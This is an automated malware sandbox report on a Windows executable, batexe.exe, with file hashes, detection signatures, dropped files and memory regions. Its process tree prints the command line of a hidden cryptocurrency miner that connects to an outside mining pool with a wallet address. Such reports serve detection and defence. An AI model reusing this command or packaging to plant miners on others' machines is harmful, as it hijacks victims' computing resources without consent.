Analysis

  • max time kernel
    295s
  • max time network
    300s
  • platform
    windows10-1703_x64
  • resource
    win10-20240221-ja
  • resource tags

    arch:x64arch:x86image:win10-20240221-jalocale:ja-jpos:windows10-1703-x64systemwindows
  • submitted
    23-02-2024 12:25

General

  • Target

    batexe.exe

  • Size

    9.4MB

  • MD5

    cdc9eacffc6d2bf43153815043064427

  • SHA1

    d05101f265f6ea87e18793ab0071f5c99edf363f

  • SHA256

    73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

  • SHA512

    fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6

  • SSDEEP

    196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score
7/10
upx

Malware Config

Signatures

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 5 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\batexe.exe
    "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4816
    • C:\Users\Admin\AppData\Local\Temp\176B.tmp\b2e.exe
      "C:\Users\Admin\AppData\Local\Temp\176B.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\176B.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2356
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1C3D.tmp\batchfile.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4132
        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
          cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:1148

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\176B.tmp\b2e.exe

    Filesize

    3.1MB

    MD5

    33732f8e644777ac37c91ad37f221a9e

    SHA1

    c4af43e643ccaddad566ee3c6e272b4629e1a729

    SHA256

    1bd6c9dcd4a711aad6004923672b048e98e1ccb7d4b262d30f7c86b8026cc413

    SHA512

    25183001e035f0f83cdc1daf65610bc622c932cb9b45a1ee8c974364784fcea18d84bfdf0ceb03a6285110f6d408eb6a6d19ee85b9cecfa535387299ad278d9b

  • C:\Users\Admin\AppData\Local\Temp\176B.tmp\b2e.exe

    Filesize

    2.8MB

    MD5

    1f04ef78e57b7d6a9adcb0226aaf2734

    SHA1

    30d4cf094fdc6409215dbab1748e3765c17b5e83

    SHA256

    11c15345c5b64033a7a2c2c265c4c550122564229be0262f6384ec7c80d04483

    SHA512

    4af6227c0090855ff22196bff65b494c47554416dba89f41ae7285e419caf9544b7c0212105b3493e281b8df8411c5e517a8557080eea1e92ecdd73c7e09d884

  • C:\Users\Admin\AppData\Local\Temp\1C3D.tmp\batchfile.bat

    Filesize

    136B

    MD5

    8ea7ac72a10251ecfb42ef4a88bd330a

    SHA1

    c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

    SHA256

    65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

    SHA512

    a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    1.8MB

    MD5

    cf0b1ff4743a29f62b1f538ddecda605

    SHA1

    efc4a00ad41311e9772378685407c6da24c1311e

    SHA256

    d4357cb6e86680dc8eccbaa2f27bf831f0539098cddd67336380c45ab312c8d6

    SHA512

    3192fc7416d331e1f4e94fc2cc34bf03a0c96752691a4035d5946b0b0f98299ea8d297c9cd8c589711bc1add3fce1219bca6a38fbe8f2ce050318226589dda4a

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    1.4MB

    MD5

    26c288ad93b7732e9da4e65826cba9be

    SHA1

    1807f769c01777b790befb309d303c6678f50043

    SHA256

    49f18c7090956a99b5f018541e7a6f6ab650ebc34d3a56c4bcc9817ee7cb55b9

    SHA512

    f19d4cc23eb33da2d697f3fd1bb20720e8b5931af5bce1d2a1764e80fbf0f598e51b6d202d05f8286daaad7cce865b88a89786d3f8d1695ee7a91e7f64147df1

  • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

    Filesize

    836KB

    MD5

    aeab40ed9a8e627ea7cefc1f5cf9bf7a

    SHA1

    5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

    SHA256

    218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

    SHA512

    c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

  • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

    Filesize

    1.2MB

    MD5

    7cf672bee2afba2dcd0c031ff985958e

    SHA1

    6b82a205db080ffdcb4a4470fce85a14413f3217

    SHA256

    c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

    SHA512

    3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    1.2MB

    MD5

    a130257026a9a69e50bb9f57aa5e97fb

    SHA1

    f2ee98c50cfd2d9cf39fd3873a74c326c539966b

    SHA256

    f38f323404c7918d8e354846de4482555e85ee2766d2e9679f03ebb27f15d83c

    SHA512

    947723c49da53f241211ce9d3299f9140a40ebea411d83ce3b644570c0fd252c35a70b6192bf3451c8f2c2af634c874dd427219ecb8fb2d86ab7e4c06a781307

  • C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

    Filesize

    606KB

    MD5

    585efec1bc1d4d916a4402c9875dff75

    SHA1

    d209613666ccac9d0ddab29a3bc59aa00a0968fa

    SHA256

    2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

    SHA512

    b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

  • \Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

    Filesize

    1.2MB

    MD5

    8ee1054cc4c0b0195c0cfe5a181ca7c2

    SHA1

    f13254e6241666a30f64f42896163ce2b0d26b1a

    SHA256

    6ac5c6bcdc9d582460e2d92fad1eac6b1c74472baf32c6021be1750ef9826501

    SHA512

    149efcb30b4761f5b9ae90f7b20c1a5adb4ef391540c4eba0f6fcc6a46302be4b1e47e2742b66413bd3b31dccd70794e12dd7c13fc783a8a261544dfa51a213a

  • \Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    897KB

    MD5

    3de093dd718e23d8ff43a4a6e376fc3b

    SHA1

    db144c06b2405a55343a95f3d67f2cd9759d3e46

    SHA256

    e0d74a6c59671397de5f59ce0de82ab82d982d06c01af6858a520d659d7ecbeb

    SHA512

    6fcff13a6554e7c8320f7ff021bb359a0fa67b80d27c9453e2bb40d788cf86436c2dabc4976b6cc506aea4c3ec72bcf294968632ca91b57e33f2124dea44f2de

  • \Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    827KB

    MD5

    c327c1658c15306d6a32c316ba794957

    SHA1

    2839bf6714c8b27651d5cde3cbe18915347d4c04

    SHA256

    ea9e071d8bc05b07eeca12e661fb31c75bca5a0691129c60596621c4594fa8a0

    SHA512

    4970424e1dd3a01d0fa0a94270fca2588cc48554611c4afd3cb3b2e8c31240de16cdf6270c3f09ab08e94421102962930a34136b18dcaecb8cc61c88e301e4c3

  • memory/1148-40-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/1148-51-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/1148-101-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/1148-42-0x0000000061440000-0x000000006156B000-memory.dmp

    Filesize

    1.2MB

  • memory/1148-41-0x0000000070800000-0x00000000708BC000-memory.dmp

    Filesize

    752KB

  • memory/1148-43-0x0000000061DB0000-0x0000000061E48000-memory.dmp

    Filesize

    608KB

  • memory/1148-44-0x00000000010B0000-0x0000000002965000-memory.dmp

    Filesize

    24.7MB

  • memory/1148-45-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/1148-91-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/1148-81-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/1148-56-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/1148-61-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/1148-66-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/1148-71-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/1148-76-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/2356-50-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/2356-5-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/4816-6-0x0000000000400000-0x000000000393A000-memory.dmp

    Filesize

    53.2MB